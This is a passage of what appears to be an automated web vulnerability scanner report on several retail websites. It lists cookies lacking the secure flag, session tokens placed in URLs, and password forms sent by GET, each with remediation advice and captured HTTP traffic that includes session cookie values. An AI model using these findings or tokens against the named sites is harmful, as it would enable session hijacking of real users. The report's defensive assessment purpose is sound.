...[SNIP]...

9.17. https://www.restorationhardware.com/my-account/sign-in.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /my-account/sign-in.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /my-account/sign-in.jsp?link=topnav_signin HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: http://www.restorationhardware.com/content/promo.jsp?id=138040&&link=SFGalleryStore
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757}; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; engagement=3; fsr.a=1305511164164

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:09:55 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=ef27e626254569019b6a3249227030c92efa223a5124b4964dd08c1b; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:09:55 GMT
Content-Length: 19152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
...[SNIP]...

9.18. https://www.restorationhardware.com/sitewide/data/json/profile-status.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /sitewide/data/json/profile-status.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitewide/data/json/profile-status.jsp?_=1305511192551 HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; engagement=3; fsr.a=1305511192538; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 94
Date: Mon, 16 May 2011 02:10:10 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=5bd8da43812e2d44f3717ac9451ad5a82efa223a5124b4964dd08c2a; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:10:10 GMT


{"status":"-1","cartCount":"0"
   ,"wishList":"gl390568157"
   ,"giftLists":[]
   ,"firstName":""}

9.19. https://www.restorationhardware.com/sitewide/includes/header/expanding-banner-controller.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /sitewide/includes/header/expanding-banner-controller.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitewide/includes/header/expanding-banner-controller.jsp?categoryId=&section=my-account&subsection=sign-in&_=1305511197171 HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}; engagement=4; fsr.a=1305511197072

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:10:21 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=f5d76e447a12f51b020b9a893d636ab62efa223a5124b4964dd08c32; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:10:18 GMT
Content-Length: 923

<script type="text/javascript">
       $(document).ready(function() {
           // Drop Down Banners with parameters for: banner div, cookie name, delay before appearing (in seconds), delay before disappearing (i
...[SNIP]...

10. Session token in URL
There are 7 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


10.1. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mbox12.offermatica.com
Path:   /m2/guitarcenter/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/guitarcenter/mbox/standard?mboxHost=www.guitarcenter.com&mboxSession=1305510019406-714170&mboxPC=1305510019406-714170.17&mboxPage=1305510818677-601208&mboxCount=1&mbox=GC_hp_events&mboxId=0&mboxURL=http%3A%2F%2Fwww.guitarcenter.com%2F%3FCJAID%3D10453836%26CJPID%3D2537521&mboxReferrer=&mboxVersion=34 HTTP/1.1
Host: mbox12.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 167
Date: Mon, 16 May 2011 01:53:40 GMT
Server: Test & Target

mboxFactories.get('default').get('GC_hp_events',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1305510019406-714170.17");

10.2. http://t.p.mybuys.com/webrec/wr.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://t.p.mybuys.com
Path:   /webrec/wr.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /webrec/wr.do?client=FTD&sessionId=129049F1-9E12-5C65-0540-FAB5539F48D0&pt=h&mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457&lang=en&v=4.7.3&mbts=1305510812851&rf=http%3A%2F%2Fwww.ftd.com%2F&purl=http%3A%2F%2Fwww.ftd.com%2F HTTP/1.1
Host: t.p.mybuys.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=51654E8D34B839005773ACAD4995CED6; mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=121DDBF01A174938896EB120A64A3127; Path=/webrec
Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF; Domain=.mybuys.com; Expires=Sat, 03-Jun-2079 05:07:43 GMT; Path=/
Vary: Accept-Encoding
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 34

<html>
<body>
</body>
</html>

10.3. http://www.acehardware.com/storeLocServ

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.acehardware.com
Path:   /storeLocServ

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /storeLocServ?light=true&token=ACE&operation=radiusSearch&radius=30&lat=44.5&lon=-72.646&time=1305510862342 HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp
X-Prototype-Version: 1.4.0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.session={"v":1,"rid":"1305510186434_570135","pv":1,"to":3,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510830898}; __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.2.10.1305510171; s_pers=%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20s_nr%3D1305510836971%7C1308102836971%3B%20gpv_p27%3DHome%2520Page%7C1305512636976%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1305510861947

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:12 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/x-json
Content-Length: 33

{ "RESULTS" : []
,
"COUNT" : 12}

10.4. http://www.bluefly.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.bluefly.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSLB=1; SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSRT=6YPQTQA; SSOD=AGHw_gAA

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:31 GMT
Set-Cookie: SSLB=1; path=/; domain=.bluefly.com
Set-Cookie: SSRT=e4XQTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:01:31 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP06 (build: SVNTag=JBPAPP_4_3_0_GA_CP06 date=200907141446)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yLERDUy1DU1IvOS4yLFNlcnZpY2UvOS4yLENBRi85LjIgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wICBd
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 01 Oct 2010 19:42:13 GMT
Pragma: no-cache
Set-Cookie: TLTHID=6B1BA5627F60107F23AEA0F517B78A48; Path=/; Domain=.bluefly.com
Set-Cookie: TLTSID=6B1BA5627F60107F23AEA0F517B78A48; Path=/; Domain=.bluefly.com
Set-Cookie: JSESSIONID=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12; Path=/
Set-Cookie: _714bc2c9=guest; Expires=Tue, 15-May-2012 02:01:31 GMT; Path=/
Set-Cookie: CS_TRACKER_ID=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12; Expires=Sat, 03-Jun-2079 05:15:38 GMT
RTSS: 1
Set-Cookie: TS18d374=e7c2bf9d5c17e0294f3546cf4c9ad3fb60874fe9f20602d14dd0857b; Path=/
Content-Length: 43592


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="ht
...[SNIP]...



Welcome to Bluefly, <a title="login" href="/myfly/login.jsp;jsessionid=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12">login</a> or register
<a title="register" href="/myfly/login.jsp;jsessionid=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12">here</a>
...[SNIP]...
<li id="navCS"><a href="/custom/custom.jsp;jsessionid=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12?promoId=m480129">Customer Service</a>
...[SNIP]...
<div id="navShopBag">
<a title="shopping bag" href="/cart/cart.jsp;jsessionid=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12">
<span id="textShopBag">
...[SNIP]...

10.5. http://www.bluefly.com/myfly/login.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.bluefly.com
Path:   /myfly/login.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /myfly/login.jsp;jsessionid=ONzgfawlrUIPLStla7ZseA**.bluefly_node4 HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSOD=AGHw_gAA; SSLB=1; SSRT=64PQTQE; TLTHID=7D2A76E47F5F107F24CCB1BBDF37F7B5; TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; JSESSIONID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; _714bc2c9=guest; CS_TRACKER_ID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; __utmb=9200358.1.10.1305510900; cmTPSet=Y; mr_referredVisitor=0; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%5D; TS18d374=f627709e7890e7b2182df7e64b5a37d2dc25568252c8426a4dd083eb; CoreAt=; cmRS=&t1=1305510900223&t2=1305510909795&t3=1305511130583&lti=1305511130581&ln=&hr=/myfly/login.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4&fti=&fn=keyword_search_0%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=core.bluefly.com/cm%3F&ci=90039438

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:07:01 GMT
Set-Cookie: SSLB=1; path=/; domain=.bluefly.com
Set-Cookie: SSRT=xYbQTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:07:01 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP06 (build: SVNTag=JBPAPP_4_3_0_GA_CP06 date=200907141446)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yLERDUy1DU1IvOS4yLFNlcnZpY2UvOS4yLENBRi85LjIgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wICBd
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 01 Oct 2010 19:42:13 GMT
Pragma: no-cache
Set-Cookie: TLTHID=2FF624847F61107F23939AFFB4D3A655; Path=/; Domain=.bluefly.com
RTSS: 1
Set-Cookie: TS18d374=abc710a5695fda7f92b304b93d86d0cedc25568252c8426a4dd086c5; Path=/
Content-Length: 67225


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www
...[SNIP]...

10.6. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=194699513895760&app_id=194699513895760&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df394caa838%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3c6351cfc%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc3c3701%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df206eae43%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc3c3701&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3c396bb9%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc3c3701&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df39c6acff%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc3c3701&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=1#cb=f3c396bb9&origin=http%3A%2F%2Fwww.bluenile.com%2Ff315278f74&relation=parent&transport=postmessage&frame=fc3c3701
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.213.67
X-Cnection: close
Date: Mon, 16 May 2011 01:55:47 GMT
Content-Length: 0


10.7. https://www.toshibadirect.com/images/ui5/btn_login.gif

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.toshibadirect.com
Path:   /images/ui5/btn_login.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /images/ui5/btn_login.gif?BV_SessionID=@@@@0287336128.1305542699@@@@&BV_EngineID=cccdadfdidkkkjmcgfkceghdgngdglo.0 HTTP/1.1
Host: www.toshibadirect.com
Connection: keep-alive
Referer: https://www.toshibadirect.com/td/b2c/myaccount.to
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1730020066.1305542428@@@@; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:2&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_nr%3D1305511275999%7C1308103275999%3B%20s_vnum%3D1308102050353%2526vn%253D2%7C1308102050353%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%252C%255B'Referrers'%252C'1305542445659'%255D%255D%7C1463395245659%3B%20s_invisit%3Dtrue%7C1305544320370%3B%20omtr_lv%3D1305542520372%7C1400150520372%3B%20omtr_lv_s%3DLess%2520than%25201%2520day%7C1305544320372%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305544320381%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20omtr_eVar49%3DD%253Dc49%3B%20c_m%3Dundefinedburpburp%3B%20s_sq%3D%3B%20s_ppv%3D32%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:45:30 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Last-Modified: Wed, 04 Jun 2008 16:09:18 GMT
Accept-Ranges: bytes
Content-Length: 945
Cache-Control: max-age=604800
Expires: Mon, 23 May 2011 10:45:30 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89al....e...,..DD.'........).................

.3$..........%%....ED.66..........dd.D&.nc.......::..    ..........+
................l[....PD.......((.+$.JD.9&....H+....GD.0........TT.\\.P4.iR.55....
...[SNIP]...

11. Password field submitted using GET method
There are 12 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


11.1. https://ordering.ftd.com/new-signup/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /new-signup/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request

GET /new-signup/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:28:42 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:28:42 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 117006


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="toolbar_signin_form" width="240" style="z-index:1001"> <form style="margin:0px;" action="https://ordering.ftd.com/528/signin/"> <table width="240" border="0" cellpadding="1">
...[SNIP]...
</label> <input class="password" type="password" name="password" value="" maxlength="18" style="width:125px;" /></div>
...[SNIP]...

11.2. https://ordering.ftd.com/new-signup/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /new-signup/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request

GET /new-signup/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
